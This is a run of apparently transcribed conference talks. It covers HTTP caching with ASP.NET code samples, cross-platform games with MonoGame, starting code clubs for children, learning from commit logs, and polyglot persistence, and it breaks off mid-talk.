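    static void Apply(HttpResponseMessage response)
    {
        var cacheControl = new CacheControlHeaderValue
        {
            Public = true,
            MaxAge = TimeSpan.FromSeconds(600)
        };
        // Keep serving the stale copy for up to 30s while the cache revalidates in the background...
        cacheControl.Extensions.Add(new NameValueHeaderValue("stale-while-revalidate", "30"));
        // ...and for up to 5s if the origin server is erroring.
        cacheControl.Extensions.Add(new NameValueHeaderValue("stale-if-error", "5"));
        response.Headers.CacheControl = cacheControl;
    }
}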
In HTTP, we don't do that because we can't tell for sure that the resource has been deleted. What we can tell is whatever was cached should be removed. So we flush the results of a delete. Where do we flush it? There's a couple of locations. Also, a point that is sadly very badly known. If I delete slash unicorns, it's not necessarily slash unicorns that get flushed. It could be the content location header. And I'll remind those of you that have not seen it before. The content location lets you say that the content that you're showing in the response, the picture of the cat, is actually at this address and not at the original URI. So if I have a method that invalidates content and content location is there, that's the URI that will be flushed. If that's not there, then the location header will be there. That's for redirects, things like 302.303. I've posted, I think I have an example of that one. Yes, I posted unicorns.cgi. The result is, hey, found what you wanted. And this is the location. What do we flush in this example? We flush unicorn slash baby. Now, in practice, some caches flush both, just to be sure. But this is the one that should be flushed originally. And if neither are there, then we just flushed the URI. So that's one way of doing it. Now, again, another way that is not in the slides because it's specific to, to square it is to use a purge where you can make a request specifically to your apps, to your reverse proxy saying, please purge this entry because I know I'm not going to need it. So if you have a automated tool that absolutely needs to go and purge those entries and you want to do it specifically for your reverse proxy, you can do that. However, I really, really like when we do standard HTTP. I think it's much nicer. And that's also something new in HTTP caching. It's also in the process of being standardized. So it uses plenty of new requests. And, oh, they're lovely. We have invalidating with links. I can say from the resource from my server, if I post to Ninja Unicorns, the response can contain a list of links that should be invalidated. And I said I'd change some things. So I really know that I'm going to invalidate some entries. So I'm going to take my, for those of you that were there many years ago, agent Resty Galore is on the way back. If you don't know, if you don't understand any of that, just go on my website and check my previous presentations. She's not been out for two years. So Resty Galore is trying to become an HTTP caching Ninja. So we post that picture to Ninja Unicorns and the response is going to look like this. And this is how you invalidate with a cache. We have a new header here called the link header. This is already a standard. It was part of HTTP 1.0, dropped in 1.1. It got re-broad back to life last year. It's useful for plenty of things. The one thing that's useful here is to say, well, for that specific operation you made, I want you to invalidate slash unicorn as well. So the results that we did act upon with this one, but we're telling any cache in the infrastructure between you and the browser that this entry should be invalidated as well. Any question on that? Regarding right. Do these caching instructions apply to Azure Clouds? That's a very good question. Do they have a reverse proxy caching infrastructure on Azure? I'm not sure. Well, I would think that if you have Azure website, you can generate your caching instructions. And if you host squid on Azure, which I assume should be doable, then you would do that as well. 
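A hedged sketch of the linked-invalidation response he shows, written as an ASP.NET Web API action; the controller and model are invented, and the exact relation token ("inv" here) should be checked against the draft he refers to.

using System.Net;
using System.Net.Http;
using System.Web.Http;

public class Unicorn
{
    public string Name { get; set; }
}

public class NinjaUnicornsController : ApiController
{
    public HttpResponseMessage Post(Unicorn unicorn)
    {
        var response = Request.CreateResponse(HttpStatusCode.Created, unicorn);
        // Tell link-aware caches (e.g. Squid with the linked cache invalidation extension)
        // that this change should also flush the cached /unicorns collection.
        response.Headers.Add("Link", "</unicorns>; rel=\"inv\"");
        return response;
    }
}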
So those are the HTTP level. All the stuff that I show in the slides, it's HTTP standards. At some point, it will be implemented by whatever. But I don't know what reverse proxy infrastructure they have on Azure. Good question. I'll check. I'll check. So we can invalidate a whole bunch of resources from one resource that changed. And that's kind of cool. It's kind of useful. We can also do it completely the other way around. See, I knew I was missing slides. I'm going way too quickly. We've got invalidated by. So that's the inverse relationship of the one we just made. This one is a bit more complicated to follow. Here, I go to my Ninja Unicorn Resti Galore titles. You all right? Basically, I want to retrieve the list of titles that Resti Galore has acquired over time. And that list of titles is going to come back. And of course, if I, if poor Resti Galore dies in action or gets deleted, well, chances are this is going to be impacted by it. Take another example. Any change to a post may involve changes to the comments of that post. So instead of saying, by the way, when you get that response invalidate all these things, what we're saying here is, by the way, I'm telling you that whenever this bit changes, you need to flush me as well. So whenever you see anything that changes Resti Galore, please discard me as well. And that looks something like this. We go to our Ninja Unicorns together titles. And we get the list of titles with the link here. So you'll see the link is between brackets. That's the linking specification. Ninja Unicorn Resti Galore and the relationship is called in by. It's not very readable. But that means invalidated by. So you can give a parent resource if you think in terms of having parent and child resources that are dependent upon each other. A resource can give you a list of all the other resources that when they get invalidated, you should get invalidated with. Also implemented in Squid. So go and use it. Now, of course, one of the issues we have at that point is that a lot of reverse proxies that are out there, for example, ISA server or Microsoft full front gateway application management RP2 service to or something like that. I don't know. They changed the name a few times. I think it's full front gateway now. That works as a reverse proxy. ISA server has worked as a reverse proxy since at least 2004. So you can use that. But they don't support the new HTTP extensions I just showed you, of course. However, Squid does. So how can we combine the two together to say, for example, that we want a normal cache to not cache the data at all, but a cache that is aware of those new link headers, there's a way of linked invalidation should cache. We can use the max age instruction. So that's another one that you can put in cache control. This lets you take a resource and say, by the way, if you understand linked relationships, please keep it alive for 60 seconds until you see an invalidation happen. If you don't see invalidation happen, don't keep it around. And for those of you that don't understand that, I will have a max age of zero, which means do not cache. That lets me provide different caching instructions for new servers that supports this extension while still either stopping the caching for old servers or making it at different times. So that means max age here. And that reaches us with vestigalona being a, is not sweet, a caching ninja. So those are all the new HTTP extensions you can use for caching. 
There's two more things that are not in those slides that I wanted to talk about. The first one that you need to be very careful with is, that slide should be there, but it's in my old slide deck, which died with my laptop yesterday with orange juice. So just one, you, lovely. Cache hits are important. The one thing you want when you cache is to make sure that the cache gets hit, right? If you cache 25,000 variations of the same page, no one will ever hit the cache. Does that make sense? So how many of you know the Vary header? Few of you? Okay. So now I'm going to do a live presentation. Let's see if that works in there. Okay. There you go. Lovely. So one of the things you want to do of course when you cache is to make sure that things get cached. If I GET /unicorns like that and the result is 200 OK, Cache-Control: public, any cache is going to create a cache key behind the scenes for this so that it can go and retrieve the data again. What's the cache key going to look like in this example? It's probably going to look like something like slash unicorns because that's the address you tried to type in. Yeah? Whenever you try to retrieve it, you get to an index, you retrieve that very quickly. Now, is that enough as a key? Who thinks it's enough? Who thinks it's not enough? Who thinks... who lost the usage of their hands? See, I can't raise my arms but I have a very good reason, I've got sweaty armpits. I can't see yours. Well, it is not enough because, well, it is not always enough, because one of the things I could do is to use something called content negotiation, right? And that's going to return me some content, unicorns-are-cool equals true, which I think is a valid XML document. Now, this XML document goes into that cache key. What happens is my next request goes GET /unicorns and this time around I will accept application/json. Now, as most of you would know because you've all looked at my RESTful talks before, you should never use application/xml or application/json as content type because it's evil, but for the sake of this demonstration, we'll keep it there. If I only use slash unicorns as my cache key, what would happen? What would get retrieved a second time? Yeah, the XML, not the JSON. So the cache key is not enough at that point. However, I can't just invent from my reverse proxy which cache key needs to exist. So, of course, if you're a well-behaved piece of software, which by the way does not include OpenRasta, you would have a Vary header with Accept in it. Well, that tells the system: please add the content of my Accept header to the cache key. So what is that going to look like? It's going to look like something like this. That would be the first key that we stored for the first request, and for the second request, we'll probably have another key here that is called JSON. All right? That's how cache keys are built in reverse proxies and even in local caches. If you don't do that, you don't get the right key, you don't get the right content, everything goes poof. Or as I like to call it, tits up. So you want to try and hit those cache keys. Now, you will notice that this is a very simple example and like all simple examples, they are great to demo, but they're not actually real world.
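If you are building the API with ASP.NET Web API, a minimal sketch of being that well-behaved piece of software -- emitting Vary: Accept so caches key the entry on the negotiated media type (the controller is invented).

using System.Net;
using System.Net.Http;
using System.Web.Http;

public class UnicornsController : ApiController
{
    public HttpResponseMessage Get()
    {
        var response = Request.CreateResponse(HttpStatusCode.OK, new[] { "Ralph", "Resty Galore" });
        // Each Accept value now gets its own cache key:
        // /unicorns + application/xml and /unicorns + application/json are stored separately.
        response.Headers.Vary.Add("Accept");
        return response;
    }
}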
In the real world, I'm also going to have someone that is going to be very smart with using content negotiation, either because they finally understand how it actually works or because they drank the Kool-Aid a bit too much and they don't understand how evil it can be most of the time. And then application/xml, q equals 0.8. So for anyone that's never seen that kind of stuff, those are quality values, and they say, by the way, please give me JSON before XML because I really prefer JSON to XML because it is much better because it doesn't do extensibility and we didn't spend 12 years of our industry time trying to standardize how to do extensible formats. So let's redo it all with JSON. Anyway. So what's the cache key going to look like this time around? I hear you ask and scream. Well, this time around it's going to look like that. Can you see where I'm going with this? That's starting to be a bit of a problem. I've got now three different cache keys. Three different things are being cached. If you use ETags, it's the same thing, by the way. ETags also use cache keys like that. That's why strong ETags need to be different for your XML and your JSON. But the cache key is going to reflect that. Now, of course, if you're using ASP.NET out of the box, you'll have this, which means please vary by anything in the request. At that point, the reverse proxy, not being completely stupid, thinks: I'm not going to cache anything, it's easier. So you're going to have to make a bit of an effort to remove that Vary header. However, how many of you still negotiate some content based on the user agent string? I ask because I know it happens in the wild. Now, you know who's using Windows? Okay. Who's using .NET? Okay. So one of the things you may not know, and this is, I'm going to finish on that. That way you'll finish a bit early. You can go and have a coffee and I can go to the loo. One of the things you may not know is whenever you use .NET to write code, you're actually using the cache from Internet Explorer. That's all implemented in something called wininet.dll, which means, of course, that the behavior of your .NET application on .NET 4, for example, will be completely different based on which version of Internet Explorer you have installed, which is really cool. But one of the things that Internet Explorer did really badly before, before Internet Explorer 10, was the user agent string. Now, if you negotiate the content based on the browser, your Vary header is going to have something like that. Now, that also means that you need to understand how Internet Explorer built its user agent string before. The beginning was fixed, Mozilla, blah, blah, blah. And the thing in the brackets, have you noticed how it expands and contracts and expands and contracts a lot? Sometimes you'll have all the pieces of software you ever installed on this machine, the version of .NET, the version of Office, the version of the atomic clock server that may be in use. I don't know, plenty of stuff. That's because whenever something installs a key in the registry, Internet Explorer takes that and appends it to the user agent. What's the problem with that if you have Vary: User-Agent? You will never hit a cache key, because on average, with Internet Explorer before version 9, no two people have the same user agent string, ever. It doesn't happen. And you think that's limited to the user agent? No, it isn't, because the Accept header also works the same way.
If a piece of software like Office said, I support this media type, Internet Explorer will randomly add or remove, depending on what it thinks the request is going to be, it's going to change the Accept header. So if you use content negotiation and you use Internet Explorer before version 10, you are guaranteed never to have a cache hit. You may have a very large cache, but you're going to have a lot of cache entries. Now, the guys understand that. They fixed it in IE 10. There's a whole blog entry that shows you all the difficulties with working with all versions of IE. So do know these and do know that they're going to impact your cache hits in your cache. And that also means, by the way, that, and this is my recommendation for you, get in the habit of minting new URIs for each of your variants if you use content negotiation. I know I'm the one that introduced the framework with content negotiation out of the box six years ago, and I never did it, and I thought it was wrong, and I changed my mind because I was wrong again. So this is what you should do. Make sure that your URIs are actually including the variant that they have. This increases your cache hits. It makes the API nicer to look at, and it uses content negotiation in the right way. If you don't agree with me, you can either ask me a question about it now, and we can continue discussing it, or you can come and see me at the end. I think we have five minutes left, so I'm going to ask if anyone has any questions on what we've covered. No, no question. Well, I'm going to thank you then. I am SerialSeb. Just Google me if you want to talk to me or Twitter me. I'll be in the conference. I'll be at the attendees' events this evening, and I shall probably be in every single bar in Oslo just to remind myself of all the places I was many years ago. I want to thank you for spending the time today with me, and I hope you go and get caching.
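To make that closing recommendation concrete: one way to mint a URI per variant in ASP.NET Web API is UriPathExtensionMapping, so /unicorns.json and /unicorns.xml become distinct cacheable URIs. The route template and the "ext" convention below are my assumption of how it wires up -- double-check against the Web API documentation.

using System.Net.Http.Formatting;
using System.Net.Http.Headers;
using System.Web.Http;

public static class VariantRoutes
{
    public static void Register(HttpConfiguration config)
    {
        // /unicorns.json and /unicorns.xml each get their own URI (and their own cache key).
        config.Routes.MapHttpRoute(
            name: "UnicornsWithExtension",
            routeTemplate: "unicorns.{ext}",
            defaults: new { controller = "Unicorns" });

        config.Formatters.JsonFormatter.MediaTypeMappings.Add(
            new UriPathExtensionMapping("json", new MediaTypeHeaderValue("application/json")));
        config.Formatters.XmlFormatter.MediaTypeMappings.Add(
            new UriPathExtensionMapping("xml", new MediaTypeHeaderValue("application/xml")));
    }
}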
|
You know the basics of HTTP caching. Setting HTTP expiries on a document has no secret for you, you know how to prevent a browser from caching dynamic content and you're pretty happy with If-Modified-Since. In this session, you will discover the actual difference between strong and weak etags, how to invalidate URIs, use reverse-proxies efficiently and how much freedom the client has in overriding defaults and bossing proxies around. And if you are worried of learning all this on your own, fear not, an old friend will be there learning with us.
|
10.5446/51513 (DOI)
|
Okay. I did. Yeah. Okay. Welcome everybody. Before I start, I want to remind you to fill out the evaluation forms when we're done. I'm going to talk about cross-platform mobile gaming with MonoGame. MonoGame is an open source framework. I'm going to spend the next 10 minutes telling you what it is, what you can do, how you can use it, and give a few examples. But first, why am I here? My name is Runa Dresch-Grims. I work at Capgemini as a developer in Trondheim. I work with .NET, the .NET framework, C#, most of the time. I've been programming since I was eight years old. It's been a while. I always loved computer games. So computer games and that stuff, it's something I always liked to make. And not because I want to publish the games, but because I think it's very good learning, working with games. So MonoGame. MonoGame is an open source cross-platform implementation of the XNA framework. XNA is a game framework made by Microsoft for Windows, the Xbox, and Windows Phone 7. And MonoGame, it's a more or less faithful implementation of the XNA framework. You can use it to make 2D games, 3D games, and it runs anywhere, more or less anywhere. Of course, you can run it on desktop with Windows, Mac, Linux. It runs on mobile devices, iOS, Android, Windows Phone, Windows RT. It runs on Raspberry Pi, on PlayStation Vita. And if we remember that this is XNA, you also have the Xbox. So by implementing a game in MonoGame, you reach a wide variety of platforms. Now, how do you get started? Starting is easy. All you need is a computer, Windows, and Visual Studio. You need Visual Studio to compile content. Even though you want your game to run on a Mac or Linux, you will need a Windows PC, but the guys making the framework are working on a separate content compiler. Content is sounds, textures, graphics, music, that type of content for your game. And it needs to be compiled so that it's formatted for the device you're running on. iPhones use a different graphics format than a Windows box, for instance. If you want your game to run on the iPhone, you will need the tools from Xamarin, Xamarin.iOS, and for Android, you will need Xamarin.Android. They also have a Mac version called Xamarin.Mac. This is a version of the open source Mono framework, that is, .NET running on the other platforms. If you want your game to run on a Windows Phone or Windows RT, then you will need a Windows 8 PC. And with that, you need some knowledge, of course. It's based on XNA, so the example code is available everywhere on the net. And it's a framework that helps you build games, 2D games, 3D games, UI, all that kind of stuff. But you will need basic programming knowledge, of course, and you need to know some math, vectors, matrices, that kind of stuff. Using MonoGame is also quite easy. I'm going to give you the shortest how-to ever. I have six minutes left. In MonoGame, and in XNA for that matter, you have the concept of a game class. The game class implements your game. You have a game loop, an Update method and a Draw method that are called continuously. The Update method is where you perform AI calculations, all that stuff, and the Draw method draws your game to the screen. And that's it. You have an Initialize method where you can set up the screen resolution, connect to servers, anything you need to do, and LoadContent where you load your textures, load sound if you need that. And you can use the UnloadContent method to clean up, but usually you don't care. The game is going to close. Just a few tips on making games.
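Before his tips, a minimal sketch of that game class in C# -- roughly what the MonoGame/XNA project templates give you; the Game1 name, the "player" texture and the movement are placeholders.

using Microsoft.Xna.Framework;
using Microsoft.Xna.Framework.Graphics;

public class Game1 : Game
{
    private readonly GraphicsDeviceManager graphics;
    private SpriteBatch spriteBatch;
    private Texture2D player;
    private Vector2 position = Vector2.Zero;

    public Game1()
    {
        graphics = new GraphicsDeviceManager(this);
        Content.RootDirectory = "Content";
    }

    protected override void Initialize()
    {
        // Set up resolution, connect to servers, anything you need to do.
        base.Initialize();
    }

    protected override void LoadContent()
    {
        spriteBatch = new SpriteBatch(GraphicsDevice);
        player = Content.Load<Texture2D>("player"); // compiled content from the content pipeline
    }

    protected override void Update(GameTime gameTime)
    {
        // Input, AI, physics -- runs on every tick of the game loop.
        position.X += (float)gameTime.ElapsedGameTime.TotalSeconds * 100f;
        base.Update(gameTime);
    }

    protected override void Draw(GameTime gameTime)
    {
        GraphicsDevice.Clear(Color.CornflowerBlue);
        spriteBatch.Begin();
        spriteBatch.Draw(player, position, Color.White);
        spriteBatch.End();
        base.Draw(gameTime);
    }
}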
Remember to focus on one platform first. It's much easier. I prefer to work on the Windows phone since the tooling is so great. And when my game is running, it's usable, then I port it to, say, the iPhone and Android. And usually it's done in maybe an hour, less than that. You can use more or less exactly the same code on all platforms. If you want to use, say, the GPS or accelerometer, the camera on your phone, or mobile device, then a good trick is to make an abstraction of it. For example, I have a game where I want to use gravity. I want to know what's down. And then I define an interface, say, the gravity service, that always tells me what is down. And then on my phone, on the platforms, I implement that service. And that implementation can... I can make it fit the platform. So the accelerometer on the Android device doesn't behave exactly like on the Windows phone device. But using abstractions and interfaces, I can use more or less exactly the same code anyhow. And since we are on mobile platforms, remember to think performance. Always think performance. Try to not create objects all the time. Try to reuse them. Don't use reflection. It's low. You know that. But link is also terribly slow. So don't use that and try to pre-calculate stuff. Don't do as little as possible for each time your game loop runs. And of course, remember good coding practices like test your code, separate concerns, and so on and so on. You know it. Now, and the final challenge, of course, finishing the game. That's the hard part. And I can't help you with that. That's your job. I want to give you a few examples of what monogame can do. Because when I heard of monogame the first time, I thought, okay, it's for simple games. And you can, of course, make simple games with it. But you can also make quite impressive games. There is a game called Bastion. It's an open-game playing game that runs on the Xbox or Mac and Linux. And it's a bestseller. They're selling loads of licenses. It's story-driven, lots of graphics, lots of music. It looks incredible. It's really fun to play. Then you have Fez. It's a combination of a 2D and 3D platform game. You have to see it to understand how it works. It's brilliant. It also runs on Windows and XNA using monogame. And finally, Skulls of the Shogun. It's a turn-based strategy game, a completely different type of game. It also looks really nice. And it runs on all kinds of Windows devices. Windows Phone, Windows 8, Windows RT, and, again, the Xbox. Now, if you guys want to know more, I'm staying here for the rest of the conference. You can take contact on Twitter, email, whatever you want. A lot of talk gaming. And just a few resources. Monogame.net is the site where the guys publish information about games, tutorials, all that kind of stuff. Since this is open source, you can find it on GitHub, download, clone it. On GitHub, they have lots of resources regarding sample games and everything. So it's recommended. And this is based on XNA, so more or less all XNA tutorials are valid for Monogame. So just Google them. There is enough. That's everything. Thank you very much for listening. Thank you. Hello. You look like you've found a lot. Are your parents? Anyone? Raise hands. Children between 8 and 18, keep them up. Now, keep them up. Who are you going to go back and establish code clubs? Exactly. Very wonderful. It's not very hard, actually. I'm going to tell you a little bit how to do it. And we try to remove all the obstacles that you might meet. My name is Simon Somfurt. 
I work as CTO at Bouwer in Oslo. And I'm going to tell you a little bit about why we started to start this movement and what we're trying to accomplish. It's not very polite to plug your employer, but I had to give them a big thank you for allowing me to do this in my daytime since it exploded after about in April. And also, I would like to extend a big thank you to Pugamut Wigling, who hosted this workshop for the children two days ago. Did any of you see that go there? It was wonderful. We even got t-shirts for the children. With Code Club on it. And real badges, so they felt like they were in the conference. And also, Linda Sanvik, she established Code Club in England. And they are in 750 cities in England. So she helps us. So what's the problem? Sources within the EU says that IT represents 5% of GDP in Europe. That's not a lot, I said. But it represents 25% of the growth in Europe. And 40% of productivity growth. So IT is in all the companies, all the government, everywhere. You can't really extract it. It's in there. I was lucky to have a Commodore 64, which really forced me to learn coding because that's the only way I could do anything useful with it. The problem is that with the advent of all these good user interfaces, all the people, all the children have been removed from the possibility to know that they can even start tinkering on what's behind the scenes. It's like a car. You don't know how to, you don't know that you can look under the bonnet and see that's something you can do there. So they're becoming digital leaves. Now, if they want to change something, if they want to not just starting to make playlists and Spotify, but actually want to make another music streaming service, how would they go about that? How can we actually have more recruits to pay our pensions in the IT industry? Well, the thing is that the way the children will actually experience this will be more like this. I'm sorry, Dave. I'm afraid I can't do that. So what can we do to help them? I think that the government should be teaching, should be actually establishing programming in the schools. I mean, the cold clubs are a good thing because you teach children to program, but it will be in areas where the people are well educated and resourceful. And I will actually just keep on with the social differences. And what do the government do? It's a wonderful quote. So I sit on the advisory board of the local polytechnic, Hói Úá, engineering school in Oslo, and they were complaining about not having enough qualified student recruits. And I also sit on the board of Datafedinín in Oslo, and we established just a local group to teach local kids to code. We thought just to have that in Oslo. And then it really, really took off. It was like I just flipped the switch and people came running because everybody seemed to have this in mind. And I got with me Torga, a waterhouse, who is a very resourceful person from IKOTE Norge, ICT Norway. And we run this together. It's a movement. And what we want to do is to make the children be ready to, like I said, master and create things with digital technology, not just playlists in Spotify. So what do we do to accomplish that? Well, we arrange local code clubs or help people do that, and we help schools to teach programming. Since April, we have been establishing contracts with 20 schools in Norway who will start teaching programming. And we arrange family coding events, like I showed you the picture of first there. So you may ask, what to teach? 
Well, in the ages from 8 to about 12, you can start with visual environments like scratch. Anyone try that? It's very nice. Even if you're not a programmer as a parent, you can start using it. And Codo, which is Microsoft's alternative. And for the elder ones, you can use Python, which I think is the best to teach real programming. And it was made to be easy to learn. Now, for those of you who put your hands up, it's not really difficult to teach programming because there's full coursework available. We've been allowed to translate all the sessions from Code Club in England. We have a wonderful cooperation with Computing at School, which is aimed at teaching at teachers in England. And they've allowed us to take all the material for all the levels and just use it and be our mentors. And the Code Academy also allows us to just translate and use everything. They're very, very caring and very, yeah, I just use everything. I can help you. So no problem for those of you who start Code Clubs. And we have become 750 people since April 2nd. So we must have hit the nerve, in a sense. And we're established groups in, I think, 19 different cities. So you may ask, what type of organization are we? We're not really an organization. We don't have really much of a hierarchy. We have no much bureaucracy. We're just there to create value, to teach the children. They say organizations organize movements move. So we try to be a movement. And there's been done some research about this and how such movements create value. Basically, they have a website which allows people to do three things. Collect and distribute documented knowledge, like coursework, like experience papers, like how to talk to your local school board and so on. Connect those who know with those who don't. Like, for example, teachers who want to know, they can be mentored. And we can connect and mobilize those who can solve or create something. For example, starting Code Clubs. So that's our aim. And we're getting there. We're getting a website which allows us to do that. Which means that we don't need much staff. Like, computing a school in England, they say, no money, no staff. And I don't think we really need that in the long run. Sponsors, of course. Sponsors who can pay for robots, for arduinos, to have kids that can be lent and borrowed in the schools. Yes, of course, but not much for just administration. If you want to read more about this, I was allowed to have a write something in this paper here, this column there. And it's also on their website. But I'd like to add something. I'm just a tech bloke from the industry. I'm just someone else. I mean, I just flipped the switch. It was an explosion waiting to happen. And the real heroes, they were the ones who came before us. There were teachers, university lecturers, programmers, who did a lot on their own, but they didn't know about each other. So we gave them a home. And I think that our success is really attributed to their experience and their willingness to share and have made us reach a long way just in a few months. So back to what you can do. I want to think if you can take a friend in the business, a neighbor, if you're sitting on the school board for the parents, maybe you can suggest it. We're trying to make all this experience available on the website. So you have as few obstacles as possible if you want to do this. And all you need to do is to have kids, the coursework, a venue, friends, and there you go. 
If you want to know more about this or join in: in England, you have Computing At School and Code Club; in the US, you have code.org. I think you have these things in all the countries. But here in Norway, we're on that website. Join in. We'll end here. Follow us on Twitter, or on Facebook, and form a code club. Thank you. Thank you. Thank you. Thank you. Thank you. We created a system for your safety. You must share your knowledge. Sharing knowledge is very hard. At least I think so. Even if you're part of a very small team, having the overview of what's going on, especially in the code base, perhaps, requires quite some effort from all the participants in the team. And the problem with the lack of this overview is that it tends to make developers solve the same problems several times, right? You don't know what your colleague did two days ago. He might have written some code that you actually need today, but you didn't know, so you write it as well. And the lack of knowledge also can make developers make errors. And you tend to repeat the history. And that's not a good idea, right? We want to keep it DRY. So this clever man here said it long before me, and we tend to agree, that those who can't learn from history are doomed to repeat it. So I think we all can agree that learning what our colleagues have been doing before us is very important. If we don't do that, we'll end up in a maintenance hell. We have lots of duplicated code, lots of errors, and stuff like that. Now, there are some practices I'm pretty sure all of you are familiar with, like pair programming. Pair programming and code reviews might help with this problem. But the thing is, you only share your knowledge with one other person. If you're five on that team, the rest of the guys don't know. So by now, you probably wonder who am I? My name is Thomas Peterson. I work at Miles in Bergen as a consultant. I do software development, architecture, stuff like that, at clients. And I'm here today to teach you a little thing that I started doing, I don't know, maybe five, six years ago. It's not a silver bullet, but it's something, and I can almost certainly promise you this, it's something that will improve the quality of what you as an individual, as well as your team, delivers. So with no further ado, it goes like this. Do you drink a lot of coffee? I do, and I think most of my colleagues do. You start the day with a cup of coffee, and then you go to your computer, you sit down, and you open some of yesterday's news. And you sit there for like 10, 15, 20 minutes, I don't know, an hour, perhaps some of you, before you actually start working. And that's fine. You need something to get going in the morning. That's totally fine. But what I suggest you do instead is replacing that old news from yesterday, which isn't really that interesting either, with this. This is a commit log, for those who don't use Git. This is a commit log from Git. So you pull this up, and you can do it in any way you like. If you use GitHub, it's excellent. If you use TFS or whatever, you can do this. So you pull up this log, and you start reading what was done yesterday. So you go back to, well, not seven months ago, but at least back until yesterday, you read the commit messages, and you also read the code that was checked in. When you find something good in here, you will learn something. When you find something not that good, you have an excellent opportunity to tell your co-worker that maybe this wasn't a good idea.
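If the team is on Git, this morning routine boils down to a couple of commands (the flags are as I remember them -- see git help log):

# Yesterday's commit messages, oldest first, with which files changed
git log --since=yesterday --reverse --stat

# The same, but with the full diffs so you can read the code that was checked in
git log --since=yesterday --reverse -p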
Maybe I can help you correct it. And basically, it's just that. It's that simple. So if you start your morning routine with a cup of coffee and pull up this log and actually read through it, you will be amazed by how much stuff you actually will learn. And you might experience it can be a bit hard in the beginning, especially if you have a lot of crappy commits. Um... Has anyone done that? No. There's one. But guess what? You actually will get better at committing as well. So he has improved quite a lot already here. And you will learn a lot about committing and actually making the history in your source control useful. So you can actually use it for more than just a backup of files. So not only will your commits be more focused, you probably end up with having one feature in there at a time, code cleanups go into separate commits and stuff like that. And you probably also learn to make more specific commit messages. It might take some time, a couple of months, years, who knows, but you will get better. And if you start doing this and encourage your team to do this, the source control, as I mentioned, will no longer just be a backup of your files. You can actually use this history to both learn from it and also it's much more focused, so it's much more easier to go back and find errors and stuff like that. Um... I want to mention one more thing, and I briefly mentioned it in the beginning. Code reviews. Code reviews are also very hard. Not doing them necessarily, but getting people to do them. If you do this little exercise here, which takes you a couple of minutes each day, you also get code review for free. If you spot an error in there, you can fix it or tell someone. And doing code review is a good practice, right? I hope everybody agrees. Okay, good. It's not all me then. So you get it for free. And you might not even call it a code review. You can call it a check-in review or daily routine or whatever. And why does this work, in my opinion, or at least from my experience, is doing code review is another chore or a task that are laid upon the developer. Developers want to code. They do not want to test. They do not want to do reviews and leave. Well, not write documentation. That's certainly... So it's another task that are laid upon them, and they really don't have the time for that. Another thing is that a code review can... Someone can feel like you're looking into their code trying to see if it's screwed up, right? With this approach, you eliminate all that. You do this for your sake, for learning, and then again improving the entire team. And actually, you'll be amazed how much you will find in code. Not only errors, but you'll learn a lot of stuff about domain you're working in, fix errors, and stuff like that. So, on Monday, most of you will probably return to your office. And my hope or whatever is that you will actually start doing this, start learning from the history, and stop repeating it, at least, and encourage also your teammates to do the same. As I said, I've done this for five, six years now. The current team that I work in, I think almost everybody does it. And it's been an amazing help for us. And it's very easy. It takes basically no effort. You're going to drink that cup of coffee anyway, so... Thanks. applause applause applause Yes. Hello, everyone. My name is Ullmar Tamerk. I work at Bit Consulting, and I'm here to talk about polyglot persistence. But first, I'm going to talk a little bit about architecture. What's the starting point of good architecture? 
My view, architecture often starts by figuring out what needs and requirements the customer has for the application you're going to make. And in order to create what the customer needs, we have to know the needs and we have to know their requirements. And we draw boxes and we draw arrows. And these systems talk with each other on different protocols. Some on soap, some on rest, SQL, queues, et cetera. Some synchronous, some asynchronous. And we have different requirements for all these systems. And we keep on drawing and we create the system that meets the needs of the customer. And at the end, we add a repository, one database. And the challenge we face by adding one database is that one database often won't be enough to meet the customer needs. Let's say you choose to use a relational database. You get challenges with performance, with scaling, with object relational impedance. If you try to use a key value data store, you have problems with relations between the data. You don't have relations in key value stores. And if you use a graph database, you get challenges with scaling and object lookups. And whatever database you choose, you will meet some challenges. And we're aware of this. We know the strengths and weaknesses of, let's say, a relational database. But most of the time, we don't do anything about it. And we have, it's so easy for us to always choose the same database technology. We don't inspect the requirements or needs of the customer when we choose database. If you had done that, we would have seen that choosing the correct database technology isn't an easy task. So let's create an application. And this application so far has one requirement. It needs to read and write data. That's the only requirement we have. And usually, if we want persistence in our architecture, it's because we need to read and write data. That's the primary need for persistence. And if we follow the simplest thing that could possibly work, and these are the needs, the best solution in my mind is a key value store. It has three operations. It has get, put, and delete. So we get the third one for free. Because given these needs, the most important thing about the database is that it's easy to use, that it's fast, and it doesn't mess up your code. Your domain model will look the same in the database. But then the customer comes and he has another need. He wants to search the data. That's no surprise because so far we only have lookup, and that only gets us this far. Often you need to, let's say you have a personal database, you need to search by name, or you want to find all people living in Oslo. And a key value store doesn't support those requirements. And relational database does, but not very good. So we need search. And lots of systems have a search engine. Like Microsoft figured that search is so important so they bought fast in order to get the search engine in SharePoint. And all content management systems have both the database and the search engine. So in order to search, we add the search engine to our architecture. Not the big problems architectural wise. The application has to talk to both the key value store and the search engine. And if you get some transactional problems, you can add some synchronization. So hopefully the data will stay the same. Then the customer comes along and has a third demand. He needs relational search. And search engines doesn't do that very well. It can do it, but with a lot of duplication and heavy queries can be done, but it's not good at it. 
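Going back to the key-value store he starts with: a hedged sketch of what that three-operation abstraction could look like in C#. The interface is invented for illustration; any store (or an in-memory dictionary, for tests) can sit behind it.

using System.Collections.Generic;

public interface IKeyValueStore
{
    string Get(string key);
    void Put(string key, string value);
    void Delete(string key);
}

// In-memory stand-in; swap it for Redis, Riak or whatever store fits, without touching the domain code.
public class InMemoryKeyValueStore : IKeyValueStore
{
    private readonly Dictionary<string, string> data = new Dictionary<string, string>();

    public string Get(string key)
    {
        string value;
        return data.TryGetValue(key, out value) ? value : null;
    }

    public void Put(string key, string value)
    {
        data[key] = value;
    }

    public void Delete(string key)
    {
        data.Remove(key);
    }
}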
